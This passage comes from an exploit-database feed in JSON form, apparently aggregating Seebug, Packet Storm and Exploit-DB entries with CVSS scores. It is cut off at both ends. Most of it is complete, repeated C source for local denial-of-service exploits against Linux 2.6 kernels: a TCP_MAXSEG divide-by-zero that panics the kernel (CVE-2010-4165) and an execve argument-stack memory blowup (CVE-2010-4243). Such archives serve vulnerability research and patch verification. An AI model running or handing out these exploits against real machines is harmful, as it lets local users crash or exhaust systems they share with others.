"2011-03-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20367", "id": "SSV:20367", "sourceData": "\n /*\r\n * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2\r\n * by zx2c4\r\n *\r\n * This exploit triggers CVE-2010-4165, a divide by zero\r\n * error in net/ipv4/tcp.c. Because this is on the softirq\r\n * path, the kernel oopses and then completely dies with\r\n * no chance of recovery. It has been very reliable as a\r\n * DoS, but is not useful for triggering other bugs.\r\n *\r\n * -zx2c4, 28-2-2011\r\n */\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <net/if.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n \r\nint main()\r\n{\r\n struct sockaddr_in laddr;\r\n memset(&laddr, 0, sizeof(laddr));\r\n laddr.sin_family = AF_INET;\r\n laddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n laddr.sin_port = htons(31337);\r\n int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (listener < 0) {\r\n printf("[-] Could not open listener.\\n");\r\n return -1;\r\n }\r\n int val = 12;\r\n if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {\r\n printf("[-] Could not set sockopt.\\n");\r\n return -1;\r\n }\r\n if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n printf("[-] Could not bind to address.\\n");\r\n return -1;\r\n }\r\n if (listen(listener, 1) < 0) {\r\n printf("[-] Could not listen.\\n");\r\n return -1;\r\n }\r\n int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (hello < 0) {\r\n printf("[-] Could not open connector.\\n");\r\n return -1;\r\n }\r\n if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n printf("[-] Could not connect to listener.\\n");\r\n return -1;\r\n }\r\n printf("[-] Connection did not trigger oops.\\n");\r\n return 0;\r\n}\n ", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20367"}, {"lastseen": "2017-11-19T18:06:28", "description": "No description provided by source.", "published": "2011-03-02T00:00:00", "type": "seebug", "title": "Linux Kernel <= 2.6.37 Local Kernel Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20348", "id": "SSV:20348", "sourceData": "\n /* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)\r\n * =======================================================\r\n * A divide by 0 error occurs in tcp_select_initial_window\r\n * when processing user supplied TCP_MAXSEG facilitating a\r\n * local denial-of-service condition (kernel oops!) in all\r\n * Linux Kernel 2.6.x branch (2.6.37 & below). This issue\r\n * can be triggered easily with a call to setsockopt() on\r\n * a listening network socket and then establishing a TCP\r\n * connection to the awaiting socket.\r\n *\r\n * -- prdelka\r\n *\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n \r\n \r\nint main() {\r\n int optval, optlen, ret, sd, sd2, pid;\r\n char *host = "localhost"; \r\n struct sockaddr_in locAddr;\r\n struct sockaddr_in servAddr;\r\n struct sockaddr_in dstAddr;\r\n printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\\n"); \r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n memset(&servAddr,0,sizeof(servAddr));\r\n memset(&dstAddr,0,sizeof(dstAddr));\r\n servAddr.sin_family = AF_INET;\r\n servAddr.sin_port = htons(60000);\r\n servAddr.sin_addr.s_addr = INADDR_ANY;\r\n dstAddr.sin_family = AF_INET;\r\n inet_aton("127.0.0.1", &dstAddr.sin_addr);\r\n dstAddr.sin_port = htons(60000);\r\n if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){\r\n printf("[ Cannot bind listener service\\n");\r\n exit(-1);\r\n }\r\n listen(sd,4);\r\n optval = 12;\r\n ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));\r\n if(ret==0)\r\n {\r\n printf("[ System is not patched against CVE-2010-4165\\n[ Goodnight, sweet prince.\\n");\r\n int sin_size = sizeof(struct sockaddr_in);\r\n switch(pid = fork())\r\n {\r\n case 0:\r\n sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);\r\n sleep(3);\r\n default:\r\n sd2 = socket(AF_INET, SOCK_STREAM, 0);\r\n connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));\r\n sleep(3);\r\n }\r\n }\r\n printf("[ System is patched, no dreams for this prince\\n");\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20348", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:31:15", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.37 Local Kernel Denial of Service", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70788", "id": "SSV:70788", "sourceData": "\n /* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)\r\n * =======================================================\r\n * A divide by 0 error occurs in tcp_select_initial_window\r\n * when processing user supplied TCP_MAXSEG facilitating a\r\n * local denial-of-service condition (kernel oops!) in all\r\n * Linux Kernel 2.6.x branch (2.6.37 & below). This issue \r\n * can be triggered easily with a call to setsockopt() on \r\n * a listening network socket and then establishing a TCP\r\n * connection to the awaiting socket. \r\n * \r\n * -- prdelka\r\n *\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n\r\n\r\nint main() {\r\n\tint optval, optlen, ret, sd, sd2, pid;\r\n\tchar *host = "localhost";\t\r\n\tstruct sockaddr_in locAddr;\r\n\tstruct sockaddr_in servAddr;\r\n\tstruct sockaddr_in dstAddr;\r\n\tprintf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\\n");\t\r\n\tsd = socket(AF_INET, SOCK_STREAM, 0);\r\n\tmemset(&servAddr,0,sizeof(servAddr));\r\n\tmemset(&dstAddr,0,sizeof(dstAddr));\r\n servAddr.sin_family = AF_INET;\r\n servAddr.sin_port = htons(60000);\r\n servAddr.sin_addr.s_addr = INADDR_ANY;\r\n\tdstAddr.sin_family = AF_INET;\r\n\tinet_aton("127.0.0.1", &dstAddr.sin_addr);\r\n\tdstAddr.sin_port = htons(60000);\r\n if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){\r\n printf("[ Cannot bind listener service\\n");\r\n exit(-1);\r\n }\r\n\tlisten(sd,4);\r\n\toptval = 12;\r\n\tret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));\r\n\tif(ret==0)\r\n\t{\r\n\t\tprintf("[ System is not patched against CVE-2010-4165\\n[ Goodnight, sweet prince.\\n");\r\n\t\tint sin_size = sizeof(struct sockaddr_in);\r\n\t\tswitch(pid = fork())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tsd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);\r\n\t\t\t\tsleep(3);\r\n\t\t\tdefault:\r\n\t\t\t\tsd2 = socket(AF_INET, SOCK_STREAM, 0);\r\n\t\t\t\tconnect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));\r\n\t\t\t\tsleep(3);\r\n\t\t}\r\n\t}\r\n\tprintf("[ System is patched, no dreams for this prince\\n");\r\n\treturn 0;\r\n}\r\n\n ", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70788"}, {"lastseen": "2017-11-19T13:37:08", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71443", "id": "SSV:71443", "sourceData": "\n /*\r\n * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2\r\n * by zx2c4\r\n *\r\n * This exploit triggers CVE-2010-4165, a divide by zero\r\n * error in net/ipv4/tcp.c. Because this is on the softirq\r\n * path, the kernel oopses and then completely dies with\r\n * no chance of recovery. It has been very reliable as a\r\n * DoS, but is not useful for triggering other bugs.\r\n *\r\n * -zx2c4, 28-2-2011\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <net/if.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n\r\nint main()\r\n{\r\n\tstruct sockaddr_in laddr;\r\n\tmemset(&laddr, 0, sizeof(laddr));\r\n\tladdr.sin_family = AF_INET;\r\n\tladdr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\tladdr.sin_port = htons(31337);\r\n\tint listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\tif (listener < 0) {\r\n\t\tprintf("[-] Could not open listener.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tint val = 12;\r\n\tif (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {\r\n\t\tprintf("[-] Could not set sockopt.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tif (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n\t\tprintf("[-] Could not bind to address.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tif (listen(listener, 1) < 0) {\r\n\t\tprintf("[-] Could not listen.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tint hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\tif (hello < 0) {\r\n\t\tprintf("[-] Could not open connector.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tif (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n\t\tprintf("[-] Could not connect to listener.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\tprintf("[-] Connection did not trigger oops.\\n");\r\n\treturn 0;\r\n}\r\n\n ", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71443"}, {"lastseen": "2017-11-19T18:06:51", "description": "BUGTRAQ ID: 45004\r\nCVE ID: CVE-2010-4243\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684"OOM-killer"\u529f\u80fd\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u7ec8\u6b62\u4e0d\u76f8\u5173\u7684\u8fdb\u7a0b\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n\u6f0f\u6d1e\u6e90\u4e8eoom_kill()\u51fd\u6570\u770b\u4e0d\u5230\u6ca1\u6709\u9644\u52a0\u5230\u4efb\u4f55\u7ebf\u7a0b\u7684\u5df2\u5206\u914d\u5185\u5b58\u3002\n\nLinux kernel 2.6.24.3 - 2.6.37\r\nRedHat Enterprise Linux Desktop v.5 client\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.kernel.org/", "published": "2011-01-19T00:00:00", "type": "seebug", "title": "Linux Kernel "execve()"\u5185\u5b58\u6269\u5c55"OOM-killer"\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4243"], "modified": "2011-01-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20333", "id": "SSV:20333", "sourceData": "\n /* known for over a year, fixed in grsec\r\n bug is due to a bad limit on the max size of the stack for 32bit apps\r\n on a 64bit OS. Instead of them being limited to 1/4th of a 32bit\r\n address space, they're limited to 1/4th of a 64bit address space -- oops!\r\n in combination with vanilla ASLR, it triggers a BUG() as the stack\r\n tries to expand around the address space when shifted\r\n Below mmap_min_addr you say? uh oh! ;)\r\n\r\n Reported to Ted Tso in December 2009\r\n Linus today (Aug 13 2010) silently fixes tangential issue:\r\n http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=320b2b8de12698082609ebbc1a17165727f4c893\r\n\r\n The second bug here is that the memory usage explodes within the\r\n kernel from a single 128k allocation in userland\r\n The explosion of memory isn't accounted for by any task so it won't\r\n be terminated by the OOM killer\r\n\r\n curious what actual vuln was involved that they were trying\r\n to silently fix, as I don't think it's the one below\r\n clobbering data in a suid app by growing the stack into the mapping\r\n for the image? ;) I smell privesc...mumblings of X server/recursion\r\n\r\n ulimit -s unlimited\r\n ./64bit_dos\r\n\r\n SELinux is here to save us though with its fine-grained controls!\r\n Wait, it doesn't?\r\n Clearly the solution is to throw a buggy KVM on top of it\r\n Not enough? Ok, we'll throw in an extra SELinux, that'll really\r\n throw those hackers off when they use the same exact exploit on the\r\n host as they do on the guest!\r\n COMMON CRITERIA HERE I COME!\r\n*/\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;sys/personality.h&gt;\r\n\r\n#define NUM_ARGS 24550\r\n\r\nint main(void)\r\n{\r\n char **args;\r\n char *str;\r\n int i;\r\n\r\n /* not needed, just makes it easier for machines with less RAM */\r\n personality(PER_LINUX32_3GB);\r\n\r\n str = malloc(128 * 1024);\r\n memset(str, 'A', 128 * 1024 - 1);\r\n str[128 * 1024 - 1] = '\\0';\r\n args = malloc(NUM_ARGS * sizeof(char *));\r\n for (i = 0; i &lt; (NUM_ARGS - 1); i++)\r\n args[i] = str;\r\n args[i] = NULL;\r\n\r\n execv("/bin/sh", args);\r\n printf("execve failed\\n");\r\n\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20333", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:41", "description": "", "published": "2011-03-01T00:00:00", "type": "packetstorm", "title": "Linux Kernel 2.6.37 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-01T00:00:00", "id": "PACKETSTORM:98797", "href": "https://packetstormsecurity.com/files/98797/Linux-Kernel-2.6.37-Denial-Of-Service.html", "sourceData": "`/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165) \n* ======================================================= \n* A divide by 0 error occurs in tcp_select_initial_window \n* when processing user supplied TCP_MAXSEG facilitating a \n* local denial-of-service condition (kernel oops!) in all \n* Linux Kernel 2.6.x branch (2.6.37 & below). This issue \n* can be triggered easily with a call to setsockopt() on \n* a listening network socket and then establishing a TCP \n* connection to the awaiting socket. \n* \n* -- prdelka \n* \n*/ \n#include <stdio.h> \n#include <stdlib.h> \n#include <sys/socket.h> \n#include <netinet/in.h> \n#include <arpa/inet.h> \n#include <netinet/tcp.h> \n \n \nint main() { \nint optval, optlen, ret, sd, sd2, pid; \nchar *host = \"localhost\"; \nstruct sockaddr_in locAddr; \nstruct sockaddr_in servAddr; \nstruct sockaddr_in dstAddr; \nprintf(\"[ Linux Kernel tcp_select_initial_window divide by 0 DoS\\n\"); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nmemset(&servAddr,0,sizeof(servAddr)); \nmemset(&dstAddr,0,sizeof(dstAddr)); \nservAddr.sin_family = AF_INET; \nservAddr.sin_port = htons(60000); \nservAddr.sin_addr.s_addr = INADDR_ANY; \ndstAddr.sin_family = AF_INET; \ninet_aton(\"127.0.0.1\", &dstAddr.sin_addr); \ndstAddr.sin_port = htons(60000); \nif((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){ \nprintf(\"[ Cannot bind listener service\\n\"); \nexit(-1); \n} \nlisten(sd,4); \noptval = 12; \nret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval)); \nif(ret==0) \n{ \nprintf(\"[ System is not patched against CVE-2010-4165\\n[ Goodnight, sweet prince.\\n\"); \nint sin_size = sizeof(struct sockaddr_in); \nswitch(pid = fork()) \n{ \ncase 0: \nsd = accept(sd,(struct sockaddr *)&locAddr,&sin_size); \nsleep(3); \ndefault: \nsd2 = socket(AF_INET, SOCK_STREAM, 0); \nconnect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr)); \nsleep(3); \n} \n} \nprintf(\"[ System is patched, no dreams for this prince\\n\"); \nreturn 0; \n} \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/98797/goodnight.txt"}, {"lastseen": "2016-12-05T22:23:25", "description": "", "published": "2011-03-10T00:00:00", "type": "packetstorm", "title": "Linux Kernel 2.6 TCP_MAXSEG Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-10T00:00:00", "id": "PACKETSTORM:99147", "href": "https://packetstormsecurity.com/files/99147/Linux-Kernel-2.6-TCP_MAXSEG-Denial-Of-Service.html", "sourceData": "`/* \n* TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2 \n* by zx2c4 \n* \n* This exploit triggers CVE-2010-4165, a divide by zero \n* error in net/ipv4/tcp.c. Because this is on the softirq \n* path, the kernel oopses and then completely dies with \n* no chance of recovery. It has been very reliable as a \n* DoS, but is not useful for triggering other bugs. \n* \n* -zx2c4, 28-2-2011 \n*/ \n \n#include <stdio.h> \n#include <string.h> \n#include <sys/socket.h> \n#include <net/if.h> \n#include <arpa/inet.h> \n#include <netinet/tcp.h> \n \nint main() \n{ \nstruct sockaddr_in laddr; \nmemset(&laddr, 0, sizeof(laddr)); \nladdr.sin_family = AF_INET; \nladdr.sin_addr.s_addr = inet_addr(\"127.0.0.1\"); \nladdr.sin_port = htons(31337); \nint listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); \nif (listener < 0) { \nprintf(\"[-] Could not open listener.\\n\"); \nreturn -1; \n} \nint val = 12; \nif (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) { \nprintf(\"[-] Could not set sockopt.\\n\"); \nreturn -1; \n} \nif (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { \nprintf(\"[-] Could not bind to address.\\n\"); \nreturn -1; \n} \nif (listen(listener, 1) < 0) { \nprintf(\"[-] Could not listen.\\n\"); \nreturn -1; \n} \nint hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); \nif (hello < 0) { \nprintf(\"[-] Could not open connector.\\n\"); \nreturn -1; \n} \nif (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { \nprintf(\"[-] Could not connect to listener.\\n\"); \nreturn -1; \n} \nprintf(\"[-] Connection did not trigger oops.\\n\"); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99147/linux26maxseg-dos.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:53:30", "description": "Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS. CVE-2010-4165. Dos exploit for linux platform", "published": "2011-03-10T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-10T00:00:00", "id": "EDB-ID:16952", "href": "https://www.exploit-db.com/exploits/16952/", "sourceData": "/*\r\n * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2\r\n * by zx2c4\r\n *\r\n * This exploit triggers CVE-2010-4165, a divide by zero\r\n * error in net/ipv4/tcp.c. Because this is on the softirq\r\n * path, the kernel oopses and then completely dies with\r\n * no chance of recovery. It has been very reliable as a\r\n * DoS, but is not useful for triggering other bugs.\r\n *\r\n * -zx2c4, 28-2-2011\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <net/if.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n\r\nint main()\r\n{\r\n\tstruct sockaddr_in laddr;\r\n\tmemset(&laddr, 0, sizeof(laddr));\r\n\tladdr.sin_family = AF_INET;\r\n\tladdr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\n\tladdr.sin_port = htons(31337);\r\n\tint listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\tif (listener < 0) {\r\n\t\tprintf(\"[-] Could not open listener.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tint val = 12;\r\n\tif (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {\r\n\t\tprintf(\"[-] Could not set sockopt.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tif (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n\t\tprintf(\"[-] Could not bind to address.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tif (listen(listener, 1) < 0) {\r\n\t\tprintf(\"[-] Could not listen.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tint hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\tif (hello < 0) {\r\n\t\tprintf(\"[-] Could not open connector.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tif (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\r\n\t\tprintf(\"[-] Could not connect to listener.\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tprintf(\"[-] Connection did not trigger oops.\\n\");\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16952/"}, {"lastseen": "2016-02-01T23:26:40", "description": "Linux Kernel <= 2.6.37 - Local Kernel Denial of Service. CVE-2010-4165. Dos exploit for linux platform", "published": "2011-03-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.6.37 - Local Kernel Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-02T00:00:00", "id": "EDB-ID:16263", "href": "https://www.exploit-db.com/exploits/16263/", "sourceData": "/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)\r\n * =======================================================\r\n * A divide by 0 error occurs in tcp_select_initial_window\r\n * when processing user supplied TCP_MAXSEG facilitating a\r\n * local denial-of-service condition (kernel oops!) in all\r\n * Linux Kernel 2.6.x branch (2.6.37 & below). This issue \r\n * can be triggered easily with a call to setsockopt() on \r\n * a listening network socket and then establishing a TCP\r\n * connection to the awaiting socket. \r\n * \r\n * -- prdelka\r\n *\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/tcp.h>\r\n\r\n\r\nint main() {\r\n\tint optval, optlen, ret, sd, sd2, pid;\r\n\tchar *host = \"localhost\";\t\r\n\tstruct sockaddr_in locAddr;\r\n\tstruct sockaddr_in servAddr;\r\n\tstruct sockaddr_in dstAddr;\r\n\tprintf(\"[ Linux Kernel tcp_select_initial_window divide by 0 DoS\\n\");\t\r\n\tsd = socket(AF_INET, SOCK_STREAM, 0);\r\n\tmemset(&servAddr,0,sizeof(servAddr));\r\n\tmemset(&dstAddr,0,sizeof(dstAddr));\r\n servAddr.sin_family = AF_INET;\r\n servAddr.sin_port = htons(60000);\r\n servAddr.sin_addr.s_addr = INADDR_ANY;\r\n\tdstAddr.sin_family = AF_INET;\r\n\tinet_aton(\"127.0.0.1\", &dstAddr.sin_addr);\r\n\tdstAddr.sin_port = htons(60000);\r\n if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){\r\n printf(\"[ Cannot bind listener service\\n\");\r\n exit(-1);\r\n }\r\n\tlisten(sd,4);\r\n\toptval = 12;\r\n\tret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));\r\n\tif(ret==0)\r\n\t{\r\n\t\tprintf(\"[ System is not patched against CVE-2010-4165\\n[ Goodnight, sweet prince.\\n\");\r\n\t\tint sin_size = sizeof(struct sockaddr_in);\r\n\t\tswitch(pid = fork())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tsd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);\r\n\t\t\t\tsleep(3);\r\n\t\t\tdefault:\r\n\t\t\t\tsd2 = socket(AF_INET, SOCK_STREAM, 0);\r\n\t\t\t\tconnect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));\r\n\t\t\t\tsleep(3);\r\n\t\t}\r\n\t}\r\n\tprintf(\"[ System is patched, no dreams for this prince\\n\");\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16263/"}, {"lastseen": "2016-02-01T22:11:35", "description": "Linux Kernel 'setup_arg_pages()' Denial of Service Vulnerability. CVE-2010-3858,CVE-2010-4243. Dos exploit for linux platform", "published": "2010-11-26T00:00:00", "type": "exploitdb", "title": "Linux Kernel 'setup_arg_pages' Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4243", "CVE-2010-3858"], "modified": "2010-11-26T00:00:00", "id": "EDB-ID:15619", "href": "https://www.exploit-db.com/exploits/15619/", "sourceData": "//source: http://www.securityfocus.com/bid/44301/info\r\n/* known for over a year, fixed in grsec\r\n bug is due to a bad limit on the max size of the stack for 32bit apps\r\n on a 64bit OS. Instead of them being limited to 1/4th of a 32bit \r\n address space, they're limited to 1/4th of a 64bit address space -- oops!\r\n in combination with vanilla ASLR, it triggers a BUG() as the stack \r\n tries to expand around the address space when shifted\r\n Below mmap_min_addr you say? uh oh! ;)\r\n\r\n Reported to Ted Tso in December 2009\r\n Linus today (Aug 13 2010) silently fixes tangential issue:\r\n http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=320b2b8de12698082609ebbc1a17165727f4c893\r\n\r\n The second bug here is that the memory usage explodes within the \r\n kernel from a single 128k allocation in userland\r\n The explosion of memory isn't accounted for by any task so it won't\r\n be terminated by the OOM killer\r\n\r\n curious what actual vuln was involved that they were trying\r\n to silently fix, as I don't think it's the one below\r\n clobbering data in a suid app by growing the stack into the mapping\r\n for the image? ;) I smell privesc...mumblings of X server/recursion\r\n\r\n ulimit -s unlimited\r\n ./64bit_dos\r\n\r\n SELinux is here to save us though with its fine-grained controls!\r\n Wait, it doesn't?\r\n Clearly the solution is to throw a buggy KVM on top of it\r\n Not enough? Ok, we'll throw in an extra SELinux, that'll really \r\n throw those hackers off when they use the same exact exploit on the \r\n host as they do on the guest!\r\n COMMON CRITERIA HERE I COME!\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/personality.h>\r\n\r\n#define NUM_ARGS 24550\r\n\r\nint main(void)\r\n{\r\n char **args;\r\n char *str;\r\n int i;\r\n\r\n\t/* not needed, just makes it easier for machines with less RAM */\r\n\tpersonality(PER_LINUX32_3GB);\r\n\r\n str = malloc(128 * 1024);\r\n memset(str, 'A', 128 * 1024 - 1);\r\n str[128 * 1024 - 1] = '\\0';\r\n args = malloc(NUM_ARGS * sizeof(char *));\r\n for (i = 0; i < (NUM_ARGS - 1); i++)\r\n args[i] = str;\r\n args[i] = NULL;\r\n\r\n execv(\"/bin/sh\", args);\r\n printf(\"execve failed\\n\");\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15619/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 2.6.37-rc2 - TCP_MAXSEG Kernel Panic (Denial of Service) (2)", "edition": 1, "published": "2011-03-10T00:00:00", "title": "Linux Kernel 2.6.37-rc2 - TCP_MAXSEG Kernel Panic 